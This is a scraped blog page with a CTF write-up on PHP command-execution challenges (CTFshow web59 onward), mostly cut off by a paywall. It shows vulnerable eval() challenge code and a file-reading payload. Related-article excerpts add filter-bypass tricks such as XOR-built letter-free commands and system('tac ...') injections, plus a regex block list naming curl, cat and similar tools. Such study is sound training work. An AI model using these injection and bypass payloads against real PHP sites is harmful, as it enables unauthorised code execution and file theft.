CTFshow web(php命令执行59-67)

最新推荐文章于 2025-08-13 17:37:52 发布
原创 最新推荐文章于 2025-08-13 17:37:52 发布 · 1.4k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言 #CTFshow #web安全

                                                                        web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);

payload:​c=show_source('flag.php');​ 

我还是那句话:如果不知道对面过滤了啥,那就一个一个尝试

解释:在 PHP 中,show_source() 是一个内置函数,用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数,并将该文件的内容以文本形式进行输出。

下面是我的文章对命令执行常用语句的总结:来源于:一篇文章带你进阶CTF命令执行-优快云博客

我不想太多,一个个丢进去,看那个可以就是那个

                                                                        web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @

最低0.47元/天 解锁文章
补天阁
关注
CTFshow 命令执行 web59
Kradress的博客
12-03 279
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
ctfshow web入门 命令执行web59-63
m0_62207170的博客
04-07 253
ctfshow web入门命令执行web59-63
CTFshow web(php命令执行 55-59
csjjjd的博客
02-12 1550
遇到这类题目解法比较固定,这类题目一个解法是无字母RCE,运用自增和异或相关脚本构造system ls的另外形式,比如:("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08"^"%60%7b");点击file模式,自己选择上传的文件,然后把名字写进去,最后Send就好。打开后变成POST,把网页复制然后点击Body,我的上一篇文章有介绍,建议可以去看看。// 你们在炫技吗?// 你们在炫技吗?直接上POSTman。// 还能炫的动吗?// 你们在炫技吗?
ctfshow web59
m0_69289738的博客
09-18 88
我们使用include文件包含发现可以成功。应该是禁用的函数变了。
ctfshow-web入门-命令执行web59-web65)
Welcome To Myon'Blog !
06-30 523
都是使用 highlight_file 或者 show_source。
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 1045
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
CTFshow web入门 web57------- web77命令执行wp
2202_75289892的博客
08-06 719
过滤了数字字母以及一些符号,输入参数c,题目提示了flag在36.php,由于输入参数后添加了cat c.php,只需要输入36即可,但数字被过滤。$((~ $(())))=-1 对其取反。因此可以37个 -1相加,再取反。
CTFshow web入门 web118------- web124命令执行wp
2202_75289892的博客
08-08 717
打开是一个输入框先尝试哪些字符会被过滤,输入小写字母、数字、!等会回显evil input而大写字母、{}、?等不会被过滤查看网页源代码,system($code) 输入值赋值给code,然后放入system中想要输入nl flag.php,但是字母都被过滤了${PATH:~A} 代表路径变量的最后一位,一般是n${PWD:~A} 代表根目录的最后一位,网站的默认根目录是var/www/html ,最后一位是l所以二者合起来就是nl 而flag.php用??????
ctfshow web入门 web29-40 命令执行-1
最新发布
Azure_lyn的博客
08-13 791
本人初学,如有错误欢迎批评指正~
ctfshow学习记录-web入门(命令执行59-68)
龟速更新的九某人
06-13 480
ctfshow学习记录-web入门(命令执行web59-68)
命令执行(3)ctfshow_web入门命令执行web50-59
weixin_47726676的博客
05-13 1284
web50-51 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){ system($c." >/dev/null 2>&1"); 空格,%09,%26都没有了,采用带行号读的命令
CTFshow web56 57 58 59 60-65
ChenD的学习笔记
11-12 1097
CTFshow web56 web57 web58 web59 web60 web61 web62 web63 web64 web65
ctfshow---命令执行
fainpo的博客
03-20 1853
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
ctfshow web入门 命令执行58-71
rawrecruit的博客
04-05 4195
ctfshow web入门 命令执行篇的个人刷题记录。
CTFshow命令执行29-123
qq_43534481的博客
08-06 1693
CTFshow命令执行WP
ctfshow-web入门-命令执行web66-web70)
Welcome To Myon'Blog !
06-30 1026
先使用scandir() 进行目录扫描,对于 txt 文件,我们使用 include 进行包含就可以直接看到文件内容,ini_set用来设置php.ini的值,在函数执行的时候生效,脚本结束后,设置失效。
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
[ctfshow web入门] web59 命令执行,内部函数readfile file_get_contents被禁用
qq_50332504的博客
05-10 224
本文介绍了一种在PHP环境中绕过readfile和file_get_contents被禁用限制的方法。通过使用eval函数执行用户输入的PHP代码,可以实现读取目录内容和获取flag.php文件内容的目的。具体操作包括使用scandir函数列出当前目录内容,以及通过highlight_file、show_source、file函数或include语句读取flag.php文件。此外,还提到了使用蚁剑工具进行连接时的注意事项。这些方法适用于CTF比赛中的Web安全挑战。
ctfshow-web命令执行(web45-60)
m0_50268414的博客
11-29 2782
文章目录web45 &&等于; tab等于spaceweb46 过滤数字\*\$web47 <等于空格 ||解决黑洞web48 没什么软用web49 仍然没什么软用web50 过滤了%09%26web51 过滤了tacweb52 过滤了>和<web53 添加了回显web54 丧心病狂不让用''绕过web55 过滤了所有字母web56 过滤了所有字母2web57 \$(())web58 无回显web59 无回显2web60 无回显3 web45 &&等于; t
ctfshow web入门命令执行41
01-25
### CTFShow Web 入门命令执行挑战解析 在处理CTFShow平台中的Web类别入门级别命令执行挑战时,理解如何利用PHP代码注入来实现远程命令执行(RCE)至关重要。通过分析给定的参数传递方式以及服务器端脚本的行为模式,可以找到绕过简单过滤机制的方法。 对于此类题目,通常会提供一个带有漏洞的应用程序接口,允许攻击者通过特定输入点提交恶意数据。在这个例子中,存在两个主要入口用于测试:一个是基于URL查询字符串的方式;另一个则是表单POST请求方法[^3]。 #### 利用PHP函数进行命令执行 当遇到能够控制部分PHP源码的情况时,可以通过精心构造payload触发底层操作系统指令调用。例如,在给出的例子中有如下形式: ```php <?php echo `ls`; ?> ``` 这段代码会在当前工作目录下执行Linux/Unix系统的`ls`命令并显示其输出结果。为了进一步探索文件结构或读取敏感信息,可替换为其他有用的操作系统命令组合,如`cat`、`find`等。 针对此题目的具体场景,如果目标是获取某个特定PHP文件的内容,则可以根据上下文调整上述模板以适应实际需求。比如要逆向打印整个`ctfshow.php`文件内容,可以构建这样的HTTP GET请求: ``` ?v1=1&v2=system("tac%20ctfshow.php")/* ``` 这里使用了GNU/Linux特有的`tac`工具代替常见的`cat`命令,从而实现了从最后一行到第一行反序展示文本的效果。同时注意到了SQL注释符`/* */`的存在,这有助于屏蔽掉后续不必要的字符干扰。 另外一种常见技巧涉及直接访问内部变量状态,这对于调试和信息收集非常有帮助。假设想要查看名为`$ctfshow`的数据项详情,那么就可以发送类似下面所示的链接地址: ``` ?v1=1&v2=var_dump($ctfshow); ``` 这种方法依赖于PHP内置诊断功能——`var_dump()`函数,它能清晰地呈现出传入表达式的类型及其值。 #### 绕过基本防护措施 尽管某些情况下可能存在简单的正则表达式匹配型WAF(Web Application Firewall),但只要掌握了它们的工作原理就很容易规避这些限制。观察提供的WAF检测逻辑可知,主要是对一些关键字进行了黑名单过滤[^4]。因此,在设计最终有效载荷之前应当仔细考虑怎样巧妙避开那些被监控的关键字列表。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值